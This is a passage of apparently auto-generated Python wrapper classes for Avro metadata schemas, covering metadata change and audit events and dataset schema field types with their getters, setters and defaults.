RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataAuditEvent")
def __init__(self,
newSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
oldSnapshot: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]=None,
):
super().__init__()
self.auditHeader = auditHeader
self.oldSnapshot = oldSnapshot
self.newSnapshot = newSnapshot
@classmethod
def construct_with_defaults(cls) -> "MetadataAuditEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.oldSnapshot = self.RECORD_SCHEMA.field_map["oldSnapshot"].default
self.newSnapshot = ChartSnapshotClass.construct_with_defaults()
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def oldSnapshot(self) -> Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('oldSnapshot') # type: ignore
@oldSnapshot.setter
def oldSnapshot(self, value: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['oldSnapshot'] = value
@property
def newSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('newSnapshot') # type: ignore
@newSnapshot.setter
def newSnapshot(self, value: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['newSnapshot'] = value
class MetadataChangeEventClass(DictWrapper):
"""Kafka event for proposing a metadata change for an entity. A corresponding MetadataAuditEvent is emitted when the change is accepted and committed, otherwise a FailedMetadataChangeEvent will be emitted instead."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataChangeEvent")
def __init__(self,
proposedSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
proposedDelta: None=None,
):
super().__init__()
self.auditHeader = auditHeader
self.proposedSnapshot = proposedSnapshot
self.proposedDelta = proposedDelta
@classmethod
def construct_with_defaults(cls) -> "MetadataChangeEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.proposedSnapshot = ChartSnapshotClass.construct_with_defaults()
self.proposedDelta = self.RECORD_SCHEMA.field_map["proposedDelta"].default
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def proposedSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the proposed metadata change. Include only the aspects affected by the change in the snapshot."""
return self._inner_dict.get('proposedSnapshot') # type: ignore
@proposedSnapshot.setter
def proposedSnapshot(self, value: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the proposed metadata change. Include only the aspects affected by the change in the snapshot."""
self._inner_dict['proposedSnapshot'] = value
@property
def proposedDelta(self) -> None:
"""Getter: Delta of the proposed metadata partial update."""
return self._inner_dict.get('proposedDelta') # type: ignore
@proposedDelta.setter
def proposedDelta(self, value: None) -> None:
"""Setter: Delta of the proposed metadata partial update."""
self._inner_dict['proposedDelta'] = value
class ArrayTypeClass(DictWrapper):
"""Array field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.ArrayType")
def __init__(self,
nestedType: Union[None, List[str]]=None,
):
super().__init__()
self.nestedType = nestedType
@classmethod
def construct_with_defaults(cls) -> "ArrayTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.nestedType = self.RECORD_SCHEMA.field_map["nestedType"].default
@property
def nestedType(self) -> Union[None, List[str]]:
"""Getter: List of types this array holds."""
return self._inner_dict.get('nestedType') # type: ignore
@nestedType.setter
def nestedType(self, value: Union[None, List[str]]) -> None:
"""Setter: List of types this array holds."""
self._inner_dict['nestedType'] = value
class BinaryJsonSchemaClass(DictWrapper):
"""Schema text of binary JSON schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.BinaryJsonSchema")
def __init__(self,
schema: str,
):
super().__init__()
self.schema = schema
@classmethod
def construct_with_defaults(cls) -> "BinaryJsonSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.schema = str()
@property
def schema(self) -> str:
"""Getter: The native schema text for binary JSON file format."""
return self._inner_dict.get('schema') # type: ignore
@schema.setter
def schema(self, value: str) -> None:
"""Setter: The native schema text for binary JSON file format."""
self._inner_dict['schema'] = value
class BooleanTypeClass(DictWrapper):
"""Boolean field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.BooleanType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "BooleanTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class BytesTypeClass(DictWrapper):
"""Bytes field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.BytesType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "BytesTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class DatasetFieldForeignKeyClass(DictWrapper):
"""For non-urn based foregin keys."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.DatasetFieldForeignKey")
def __init__(self,
parentDataset: str,
currentFieldPaths: List[str],
parentField: str,
):
super().__init__()
self.parentDataset = parentDataset
self.currentFieldPaths = currentFieldPaths
self.parentField = parentField
@classmethod
def construct_with_defaults(cls) -> "DatasetFieldForeignKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.parentDataset = str()
self.currentFieldPaths = list()
self.parentField = str()
@property
def parentDataset(self) -> str:
"""Getter: dataset that stores the resource."""
return self._inner_dict.get('parentDataset') # type: ignore
@parentDataset.setter
def parentDataset(self, value: str) -> None:
"""Setter: dataset that stores the resource."""
self._inner_dict['parentDataset'] = value
@property
def currentFieldPaths(self) -> List[str]:
"""Getter: List of fields in hosting(current) SchemaMetadata that conform a foreign key. List can contain a single entry or multiple entries if several entries in hosting schema conform a foreign key in a single parent dataset."""
return self._inner_dict.get('currentFieldPaths') # type: ignore
@currentFieldPaths.setter
def currentFieldPaths(self, value: List[str]) -> None:
"""Setter: List of fields in hosting(current) SchemaMetadata that conform a foreign key. List can contain a single entry or multiple entries if several entries in hosting schema conform a foreign key in a single parent dataset."""
self._inner_dict['currentFieldPaths'] = value
@property
def parentField(self) -> str:
"""Getter: SchemaField@fieldPath that uniquely identify field in parent dataset that this field references."""
return self._inner_dict.get('parentField') # type: ignore
@parentField.setter
def parentField(self, value: str) -> None:
"""Setter: SchemaField@fieldPath that uniquely identify field in parent dataset that this field references."""
self._inner_dict['parentField'] = value
class DateTypeClass(DictWrapper):
"""Date field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.DateType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "DateTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class EditableSchemaFieldInfoClass(DictWrapper):
"""SchemaField to describe metadata related to dataset schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EditableSchemaFieldInfo")
def __init__(self,
fieldPath: str,
description: Union[None, str]=None,
globalTags: Union[None, "GlobalTagsClass"]=None,
):
super().__init__()
self.fieldPath = fieldPath
self.description = description
self.globalTags = globalTags
@classmethod
def construct_with_defaults(cls) -> "EditableSchemaFieldInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldPath = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.globalTags = self.RECORD_SCHEMA.field_map["globalTags"].default
@property
def fieldPath(self) -> str:
"""Getter: FieldPath uniquely identifying the SchemaField this metadata is associated with"""
return self._inner_dict.get('fieldPath') # type: ignore
@fieldPath.setter
def fieldPath(self, value: str) -> None:
"""Setter: FieldPath uniquely identifying the SchemaField this metadata is associated with"""
self._inner_dict['fieldPath'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Description"""
self._inner_dict['description'] = value
@property
def globalTags(self) -> Union[None, "GlobalTagsClass"]:
"""Getter: Tags associated with the field"""
return self._inner_dict.get('globalTags') # type: ignore
@globalTags.setter
def globalTags(self, value: Union[None, "GlobalTagsClass"]) -> None:
"""Setter: Tags associated with the field"""
self._inner_dict['globalTags'] = value
class EditableSchemaMetadataClass(DictWrapper):
"""EditableSchemaMetadata stores editable changes made to schema metadata. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EditableSchemaMetadata")
def __init__(self,
editableSchemaFieldInfo: List["EditableSchemaFieldInfoClass"],
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.editableSchemaFieldInfo = editableSchemaFieldInfo
@classmethod
def construct_with_defaults(cls) -> "EditableSchemaMetadataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.editableSchemaFieldInfo = list()
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def editableSchemaFieldInfo(self) -> List["EditableSchemaFieldInfoClass"]:
"""Getter: Client provided a list of fields from document schema."""
return self._inner_dict.get('editableSchemaFieldInfo') # type: ignore
@editableSchemaFieldInfo.setter
def editableSchemaFieldInfo(self, value: List["EditableSchemaFieldInfoClass"]) -> None:
"""Setter: Client provided a list of fields from document schema."""
self._inner_dict['editableSchemaFieldInfo'] = value
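# Illustrative sketch (not part of the generated module): attaching an editable
# description to a field via EditableSchemaMetadataClass. The field path and
# description below are hypothetical; only the constructors defined above are used.
#
#   field_info = EditableSchemaFieldInfoClass(
#       fieldPath="user.email",                 # hypothetical fieldPath
#       description="Primary contact email",    # hypothetical description
#   )
#   editable = EditableSchemaMetadataClass(editableSchemaFieldInfo=[field_info])
#
# When created/lastModified are omitted, they fall back to the schema default
# ({'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}).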
class EnumTypeClass(DictWrapper):
"""Enum field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EnumType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "EnumTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class EspressoSchemaClass(DictWrapper):
"""Schema text of an espresso table schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EspressoSchema")
def __init__(self,
documentSchema: str,
tableSchema: str,
):
super().__init__()
self.documentSchema = documentSchema
self.tableSchema = tableSchema
@classmethod
def construct_with_defaults(cls) -> "EspressoSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.documentSchema = str()
self.tableSchema = str()
@property
def documentSchema(self) -> str:
"""Getter: The native espresso document schema."""
return self._inner_dict.get('documentSchema') # type: ignore
@documentSchema.setter
def documentSchema(self, value: str) -> None:
"""Setter: The native espresso document schema."""
self._inner_dict['documentSchema'] = value
@property
def tableSchema(self) -> str:
"""Getter: The espresso table schema definition."""
return self._inner_dict.get('tableSchema') # type: ignore
@tableSchema.setter
def tableSchema(self, value: str) -> None:
"""Setter: The espresso table schema definition."""
self._inner_dict['tableSchema'] = value
class FixedTypeClass(DictWrapper):
"""Fixed field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.FixedType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "FixedTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class ForeignKeySpecClass(DictWrapper):
"""Description of a foreign key in a schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.ForeignKeySpec")
def __init__(self,
foreignKey: Union["DatasetFieldForeignKeyClass", "UrnForeignKeyClass"],
):
super().__init__()
self.foreignKey = foreignKey
@classmethod
def construct_with_defaults(cls) -> "ForeignKeySpecClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.foreignKey = DatasetFieldForeignKeyClass.construct_with_defaults()
@property
def foreignKey(self) -> Union["DatasetFieldForeignKeyClass", "UrnForeignKeyClass"]:
"""Getter: Foreign key definition in metadata schema."""
return self._inner_dict.get('foreignKey') # type: ignore
@foreignKey.setter
def foreignKey(self, value: Union["DatasetFieldForeignKeyClass", "UrnForeignKeyClass"]) -> None:
"""Setter: Foreign key definition in metadata schema."""
self._inner_dict['foreignKey'] = value
class KafkaSchemaClass(DictWrapper):
"""Schema holder for kafka schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.KafkaSchema")
def __init__(self,
documentSchema: str,
):
super().__init__()
self.documentSchema = documentSchema
@classmethod
def construct_with_defaults(cls) -> "KafkaSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.documentSchema = str()
@property
def documentSchema(self) -> str:
"""Getter: The native kafka document schema. This is a human readable avro document schema."""
return self._inner_dict.get('documentSchema') # type: ignore
@documentSchema.setter
def documentSchema(self, value: str) -> None:
"""Setter: The native kafka document schema. This is a human readable avro document schema."""
self._inner_dict['documentSchema'] = value
class KeyValueSchemaClass(DictWrapper):
"""Schema text of a key-value store schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.KeyValueSchema")
def __init__(self,
keySchema: str,
valueSchema: str,
):
super().__init__()
self.keySchema = keySchema
self.valueSchema = valueSchema
@classmethod
def construct_with_defaults(cls) -> "KeyValueSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.keySchema = str()
self.valueSchema = str()
@property
def keySchema(self) -> str:
"""Getter: The raw schema for the key in the key-value store."""
return self._inner_dict.get('keySchema') # type: ignore
@keySchema.setter
def keySchema(self, value: str) -> None:
"""Setter: The raw schema for the key in the key-value store."""
self._inner_dict['keySchema'] = value
@property
def valueSchema(self) -> str:
"""Getter: The raw schema for the value in the key-value store."""
return self._inner_dict.get('valueSchema') # type: ignore
@valueSchema.setter
def valueSchema(self, value: str) -> None:
"""Setter: The raw schema for the value in the key-value store."""
self._inner_dict['valueSchema'] = value
class MapTypeClass(DictWrapper):
"""Map field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.MapType")
def __init__(self,
keyType: Union[None, str]=None,
valueType: Union[None, str]=None,
):
super().__init__()
self.keyType = keyType
self.valueType = valueType
@classmethod
def construct_with_defaults(cls) -> "MapTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.keyType = self.RECORD_SCHEMA.field_map["keyType"].default
self.valueType = self.RECORD_SCHEMA.field_map["valueType"].default
@property
def keyType(self) -> Union[None, str]:
"""Getter: Key type in a map"""
return self._inner_dict.get('keyType') # type: ignore
@keyType.setter
def keyType(self, value: Union[None, str]) -> None:
"""Setter: Key type in a map"""
self._inner_dict['keyType'] = value
@property
def valueType(self) -> Union[None, str]:
"""Getter: Type of the value in a map"""
return self._inner_dict.get('valueType') # type: ignore
@valueType.setter
def valueType(self, value: Union[None, str]) -> None:
"""Setter: Type of the value in a map"""
self._inner_dict['valueType'] = value
class MySqlDDLClass(DictWrapper):
"""Schema holder for MySql data definition language that describes an MySql table."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.MySqlDDL")
def __init__(self,
tableSchema: str,
):
super().__init__()
self.tableSchema = tableSchema
@classmethod
def construct_with_defaults(cls) -> "MySqlDDLClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tableSchema = str()
@property
def tableSchema(self) -> str:
"""Getter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
return self._inner_dict.get('tableSchema') # type: ignore
@tableSchema.setter
def tableSchema(self, value: str) -> None:
"""Setter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
self._inner_dict['tableSchema'] = value
class NullTypeClass(DictWrapper):
"""Null field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.NullType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "NullTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class NumberTypeClass(DictWrapper):
"""Number data type: long, integer, short, etc.."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.NumberType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "NumberTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class OracleDDLClass(DictWrapper):
"""Schema holder for oracle data definition language that describes an oracle table."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.OracleDDL")
def __init__(self,
tableSchema: str,
):
super().__init__()
self.tableSchema = tableSchema
@classmethod
def construct_with_defaults(cls) -> "OracleDDLClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tableSchema = str()
@property
def tableSchema(self) -> str:
"""Getter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
return self._inner_dict.get('tableSchema') # type: ignore
@tableSchema.setter
def tableSchema(self, value: str) -> None:
"""Setter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
self._inner_dict['tableSchema'] = value
class OrcSchemaClass(DictWrapper):
"""Schema text of an ORC schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.OrcSchema")
def __init__(self,
schema: str,
):
super().__init__()
self.schema = schema
@classmethod
def construct_with_defaults(cls) -> "OrcSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.schema = str()
@property
def schema(self) -> str:
"""Getter: The native schema for ORC file format."""
return self._inner_dict.get('schema') # type: ignore
@schema.setter
def schema(self, value: str) -> None:
"""Setter: The native schema for ORC file format."""
self._inner_dict['schema'] = value
class OtherSchemaClass(DictWrapper):
"""Schema holder for undefined schema types."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.OtherSchema")
def __init__(self,
rawSchema: str,
):
super().__init__()
self.rawSchema = rawSchema
@classmethod
def construct_with_defaults(cls) -> "OtherSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.rawSchema = str()
@property
def rawSchema(self) -> str:
"""Getter: The native schema in the dataset's platform."""
return self._inner_dict.get('rawSchema') # type: ignore
@rawSchema.setter
def rawSchema(self, value: str) -> None:
"""Setter: The native schema in the dataset's platform."""
self._inner_dict['rawSchema'] = value
class PrestoDDLClass(DictWrapper):
"""Schema holder for presto data definition language that describes a presto view."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.PrestoDDL")
def __init__(self,
rawSchema: str,
):
super().__init__()
self.rawSchema = rawSchema
@classmethod
def construct_with_defaults(cls) -> "PrestoDDLClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.rawSchema = str()
@property
def rawSchema(self) -> str:
"""Getter: The raw schema in the dataset's platform. This includes the DDL and the columns extracted from DDL."""
return self._inner_dict.get('rawSchema') # type: ignore
@rawSchema.setter
def rawSchema(self, value: str) -> None:
"""Setter: The raw schema in the dataset's platform. This includes the DDL and the columns extracted from DDL."""
self._inner_dict['rawSchema'] = value
class RecordTypeClass(DictWrapper):
"""Record field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.RecordType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "RecordTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class SchemaFieldClass(DictWrapper):
"""SchemaField to describe metadata related to dataset schema. Schema normalization rules: http://go/tms-schema"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.SchemaField")
def __init__(self,
fieldPath: str,
type: "SchemaFieldDataTypeClass",
nativeDataType: str,
jsonPath: Union[None, str]=None,
nullable: Optional[bool]=None,
description: Union[None, str]=None,
recursive: Optional[bool]=None,
globalTags: Union[None, "GlobalTagsClass"]=None,
glossaryTerms: Union[None, "GlossaryTermsClass"]=None,
):
super().__init__()
self.fieldPath = fieldPath
self.jsonPath = jsonPath
if nullable is None:
# default: False
self.nullable = self.RECORD_SCHEMA.field_map["nullable"].default
else:
self.nullable = nullable
self.description = description
self.type = type
self.nativeDataType = nativeDataType
if recursive is None:
# default: False
self.recursive = self.RECORD_SCHEMA.field_map["recursive"].default
else:
self.recursive = recursive
self.globalTags = globalTags
self.glossaryTerms = glossaryTerms
@classmethod
def construct_with_defaults(cls) -> "SchemaFieldClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldPath = str()
self.jsonPath = self.RECORD_SCHEMA.field_map["jsonPath"].default
self.nullable = self.RECORD_SCHEMA.field_map["nullable"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.type = SchemaFieldDataTypeClass.construct_with_defaults()
self.nativeDataType = str()
self.recursive = self.RECORD_SCHEMA.field_map["recursive"].default
self.globalTags = self.RECORD_SCHEMA.field_map["globalTags"].default
self.glossaryTerms = self.RECORD_SCHEMA.field_map["glossaryTerms"].default
@property
def fieldPath(self) -> str:
"""Getter: Flattened name of the field. Field is computed from jsonPath field. For data translation rules refer to wiki page above."""
return self._inner_dict.get('fieldPath') # type: ignore
@fieldPath.setter
def fieldPath(self, value: str) -> None:
"""Setter: Flattened name of the field. Field is computed from jsonPath field. For data translation rules refer to wiki page above."""
self._inner_dict['fieldPath'] = value
@property
def jsonPath(self) -> Union[None, str]:
"""Getter: Flattened name of a field in JSON Path notation."""
return self._inner_dict.get('jsonPath') # type: ignore
@jsonPath.setter
def jsonPath(self, value: Union[None, str]) -> None:
"""Setter: Flattened name of a field in JSON Path notation."""
self._inner_dict['jsonPath'] = value
@property
def nullable(self) -> bool:
"""Getter: Indicates if this field is optional or nullable"""
return self._inner_dict.get('nullable') # type: ignore
@nullable.setter
def nullable(self, value: bool) -> None:
"""Setter: Indicates if this field is optional or nullable"""
self._inner_dict['nullable'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Description"""
self._inner_dict['description'] = value
@property
def type(self) -> "SchemaFieldDataTypeClass":
